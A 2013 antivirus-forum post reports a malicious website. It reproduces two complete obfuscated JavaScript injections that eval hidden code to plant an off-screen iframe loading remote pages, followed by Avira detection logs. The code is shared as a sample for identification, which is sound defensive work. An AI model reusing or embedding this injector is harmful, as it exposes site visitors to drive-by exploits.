查看: 1085|回复: 0
收起左侧

[已鉴定] http://metal-muchachos.de/Radioleiste.html

[复制链接]
fireold
发表于 2013-10-29 18:47:10 | 显示全部楼层 |阅读模式

  1. /*74ed9f*/
  2. ubld = "y";
  3. qjzfum = "d" + "o" + "c" + "u" + "ment";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)++(window[qjzfum].getElementById("asd")) == null
  8.     }()
  9. } catch (cvc) {
  10.     tgjks = function(wnrki) {
  11.         wnrki = "fr" + "omCh" + wnrki;
  12.         for (tqcab = 0; tqcab < ubld.length; tqcab++) {
  13.             vnlhk += String[wnrki](cze(hbu + (ubld[tqcab])) - (105));
  14.         }
  15.     };
  16. };
  17. cze = (window.eval);
  18. hbu = "0x";
  19. gbs = 0;
  20. try {;
  21. } catch (bgbe) {
  22.     gbs = 1
  23. }
  24. if (!gbs) {
  25.     try {
  26.         ++cze(qjzfum)["\x62o" + "d" + ubld]
  27.     } catch (cvc) {
  28.         urpuqz = "^";
  29.     }
  30.     ubld = "89^cf^de^d7^cc^dd^d2^d8^d7^89^ca^cf^99^a2^91^92^89^e4^76^73^89^df^ca^db^89^dc^dd^ca^dd^d2^cc^a6^90^ca^d3^ca^e1^90^a4^76^73^89^df^ca^db^89^cc^d8^d7^dd^db^d8^d5^d5^ce^db^a6^90^d2^d7^cd^ce^e1^97^d9^d1^d9^90^a4^76^73^89^df^ca^db^89^ca^cf^89^a6^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^db^ce^ca^dd^ce^ae^d5^ce^d6^ce^d7^dd^91^90^d2^cf^db^ca^d6^ce^90^92^a4^76^73^76^73^89^ca^cf^97^dc^db^cc^89^a6^89^90^d1^dd^dd^d9^a3^98^98^e0^e0^e0^97^cf^db^d2^ce^d7^cd^dc^d1^d2^d9^cf^d8^db^dd^d8^dd^dc^97^cc^d8^d6^98^ac^9f^a0^cf^bd^b0^da^ad^97^d9^d1^d9^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^d9^d8^dc^d2^dd^d2^d8^d7^89^a6^89^90^ca^cb^dc^d8^d5^de^dd^ce^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^cc^d8^d5^d8^db^89^a6^89^90^a2^9e^a2^99^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^d1^ce^d2^d0^d1^dd^89^a6^89^90^a2^9e^a2^99^d9^e1^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^e0^d2^cd^dd^d1^89^a6^89^90^a2^9e^a2^99^d9^e1^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^d5^ce^cf^dd^89^a6^89^90^9a^99^99^99^a2^9e^a2^99^90^a4^76^73^89^ca^cf^97^dc^dd^e2^d5^ce^97^dd^d8^d9^89^a6^89^90^9a^99^99^99^a2^9e^a2^99^90^a4^76^73^76^73^89^d2^cf^89^91^8a^cd^d8^cc^de^d6^ce^d7^dd^97^d0^ce^dd^ae^d5^ce^d6^ce^d7^dd^ab^e2^b2^cd^91^90^ca^cf^90^92^92^89^e4^76^73^89^cd^d8^cc^de^d6^ce^d7^dd^97^e0^db^d2^dd^ce^91^90^a5^d9^89^d2^cd^a6^c5^90^ca^cf^c5^90^89^cc^d5^ca^dc^dc^a6^c5^90^ca^cf^99^a2^c5^90^89^a7^a5^98^d9^a7^90^92^a4^76^73^89^cd^d8^cc^de^d6^ce^d7^dd^97^d0^ce^dd^ae^d5^ce^d6^ce^d7^dd^ab^e2^b2^cd^91^90^ca^cf^90^92^97^ca^d9^d9^ce^d7^cd^ac^d1^d2^d5^cd^91^ca^cf^92^a4^76^73^89^e6^76^73^e6^76^73^cf^de^d7^cc^dd^d2^d8^d7^89^bc^ce^dd^ac^d8^d8^d4^d2^ce^91^cc^d8^d8^d4^d2^ce^b7^ca^d6^ce^95^cc^d8^d8^d4^d2^ce^bf^ca^d5^de^ce^95^d7^ad^ca^e2^dc^95^d9^ca^dd^d1^92^89^e4^76^73^89^df^ca^db^89^dd^d8^cd^ca^e2^89^a6^89^d7^ce^e0^89^ad^ca^dd^ce^91^92^a4^76^73^89^df^ca^db^89^ce^e1^d9^d2^db^ce^89^a6^89^d7^ce^e0^89^ad^ca^dd^ce^91^92^a4^76^73^89^d2^cf^89^91^d7^ad^ca^e2^dc^a6^a6^d7^de^d5^d5^89^e5^e5^89^d7^ad^ca^e2^dc^a6^a6^99^92^89^d7^ad^ca^e2^dc^a6^9a^a4^76^73^89^ce^e1^d9^d2^db^ce^97^dc^ce^dd^bd^d2^d6^ce^91^dd^d8^cd^ca^e2^97^d0^ce^dd^bd^d2^d6^ce^91^92^89^94^89^9c^9f^99^99^99^99^99^93^9b^9d^93^d7^ad^ca^e2^dc^92^a4^76^73^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^89^a6^89^cc^d8^d8^d4^d2^ce^b7^ca^d6^ce^94^8b^a6^8b^94^ce^dc^cc^ca^d9^ce^91^cc^d8^d8^d4^d2^ce^bf^ca^d5^de^ce^92^76^73^89^94^89^8b^a4^ce^e1^d9^d2^db^ce^dc^a6^8b^89^94^89^ce^e1^d9^d2^db^ce^97^dd^d8^b0^b6^bd^bc^dd^db^d2^d7^d0^91^92^89^94^89^91^91^d9^ca^dd^d1^92^89^a8^89^8b^a4^89^d9^ca^dd^d1^a6^8b^89^94^89^d9^ca^dd^d1^89^a3^89^8b^8b^92^a4^76^73^e6^76^73^cf^de^d7^cc^dd^d2^d8^d7^89^b0^ce^dd^ac^d8^d8^d4^d2^ce^91^89^d7^ca^d6^ce^89^92^89^e4^76^73^89^df^ca^db^89^dc^dd^ca^db^dd^89^a6^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^97^d2^d7^cd^ce^e1^b8^cf^91^89^d7^ca^d6^ce^89^94^89^8b^a6^8b^89^92^a4^76^73^89^df^ca^db^89^d5^ce^d7^89^a6^89^dc^dd^ca^db^dd^89^94^89^d7^ca^d6^ce^97^d5^ce^d7^d0^dd^d1^89^94^89^9a^a4^76^73^89^d2^cf^89^91^89^91^89^8a^dc^dd^ca^db^dd^89^92^89^8f^8f^76^73^89^91^89^d7^ca^d6^ce^89^8a^a6^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^97^dc^de^cb^dc^dd^db^d2^d7^d0^91^89^99^95^89^d7^ca^d6^ce^97^d5^ce^d7^d0^dd^d1^89^92^89^92^89^92^76^73^89^e4^76^73^89^db^ce^dd^de^db^d7^89^d7^de^d5^d5^a4^76^73^89^e6^76^73^89^d2^cf^89^91^89^dc^dd^ca^db^dd^89^a6^a6^89^96^9a^89^92^89^db^ce^dd^de^db^d7^89^d7^de^d5^d5^a4^76^73^89^df^ca^db^89^ce^d7^cd^89^a6^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^97^d2^d7^cd^ce^e1^b8^cf^91^89^8b^a4^8b^95^89^d5^ce^d7^89^92^a4^76^73^89^d2^cf^89^91^89^ce^d7^cd^89^a6^a6^89^96^9a^89^92^89^ce^d7^cd^89^a6^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^97^d5^ce^d7^d0^dd^d1^a4^76^73^89^db^ce^dd^de^db^d7^89^de^d7^ce^dc^cc^ca^d9^ce^91^89^cd^d8^cc^de^d6^ce^d7^dd^97^cc^d8^d8^d4^d2^ce^97^dc^de^cb^dc^dd^db^d2^d7^d0^91^89^d5^ce^d7^95^89^ce^d7^cd^89^92^89^92^a4^76^73^e6^76^73^d2^cf^89^91^d7^ca^df^d2^d0^ca^dd^d8^db^97^cc^d8^d8^d4^d2^ce^ae^d7^ca^cb^d5^ce^cd^92^76^73^e4^76^73^d2^cf^91^b0^ce^dd^ac^d8^d8^d4^d2^ce^91^90^df^d2^dc^d2^dd^ce^cd^c8^de^da^90^92^a6^a6^9e^9e^92^e4^e6^ce^d5^dc^ce^e4^bc^ce^dd^ac^d8^d8^d4^d2^ce^91^90^df^d2^dc^d2^dd^ce^cd^c8^de^da^90^95^89^90^9e^9e^90^95^89^90^9a^90^95^89^90^98^90^92^a4^76^73^76^73^ca^cf^99^a2^91^92^a4^76^73^e6^76^73^e6".split(urpuqz);
  31.     vnlhk = "";
  32.     tgjks("arCode");
  33.     cze("" + vnlhk);
  34. } /*/74ed9f*/


  35. /*a9a007*/
  36. zdr = document;
  37. gtzv = "spl" + "i" + "t";
  38. ifq = window;
  39. rkx = "0" + "x";
  40. nlvml = (5 - 3 - 1);
  41. try {
  42.     --(zdr["body"])
  43. } catch (btvzk) {
  44.     erdjiy = false;
  45.     try {} catch (swexo) {
  46.         erdjiy = 21;
  47.     }
  48.     if (1) {
  49.         vqb = "17:5d:6c:65:5a:6b:60:66:65:17:66:5b:63:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:63:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:66:5b:63:65:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6a:6b:69:66:62:5c:6a:25:5b:5c:26:69:5c:63:58:70:25:67:5f:67:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2c:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2c:67:6f:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2c:67:6f:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2c:1e:32:4:1:17:66:5b:63:65:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2c:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:66:5b:63:65:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:66:5b:63:65:53:1e:17:5a:63:58:6a:6a:34:53:1e:66:5b:63:65:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:66:5b:63:65:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:66:5b:63:65:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:63:65:27:30:1f:20:32:4:1:74:4:1:74" [gtzv](":");
  50.     }
  51.     ifq = vqb;
  52.     vlfkjg = [];
  53.     for (nshv = 22 - 20 - 2; - nshv + 1391 != 0; nshv += 1) {
  54.         ija = nshv;
  55.         if ((0x19 == 031)) vlfkjg += String.fromCharCode(eval(rkx + ifq[1 * ija]) + 0xa - nlvml);
  56.     }
  57.     twzdi = eval;
  58.     twzdi(vlfkjg)
  59. } /*/a9a007*/
复制代码


Avira
2013/10/29 下午 06:42 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\Radioleiste[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '5aca3e9d.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:42 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        825
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/29 下午 06:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\AC_RunActiveContent[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '5aa33f5f.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:41 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        825
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/29 下午 06:41 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        824
      目錄數:        0
      惡意程式碼數:        0
      警告數:        0

2013/10/29 下午 06:41 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\Radioleiste[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/10/29 下午 06:41 [Web Protection] 發現惡意程式碼
      從 URL "http://metal-muchachos.de/Radioleiste.html" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2013/10/29 下午 06:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\e107[1].js'
      包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
      已採取動作:
      檔案會移動至 '42e21da6.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\calendar-setup_stripped[1].js'
      包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
      已採取動作:
      檔案會移動至 '5a313231.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:41 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        827
      目錄數:        0
      惡意程式碼數:        3
      警告數:        0

2013/10/29 下午 06:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\English[1].js'
      包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
      已採取動作:
      檔案會移動至 '10f4470b.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:41 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/10/29 下午 06:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/10/29 下午 06:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\Radioleiste[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/10/29 下午 06:40 [Web Protection] 發現惡意程式碼
      從 URL "http://metal-muchachos.de/Scripts/AC_RunActiveContent.js" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2013/10/29 下午 06:40 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\event[1].htm'
      包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
      已採取動作:
      檔案會移動至 '54c33035.qua' 名稱底下的隔離區目錄。.

2013/10/29 下午 06:40 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        826
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/29 下午 06:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\Radioleiste[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/10/29 下午 06:40 [Web Protection] 發現惡意程式碼
      從 URL "http://metal-muchachos.de/Radioleiste.html" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2013/10/29 下午 06:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\Radioleiste[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/10/29 下午 06:40 [Web Protection] 發現惡意程式碼
      從 URL "http://metal-muchachos.de/Radioleiste.html" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過


av3.jpg



fs is
fs3.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 11:51 , Processed in 0.130348 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表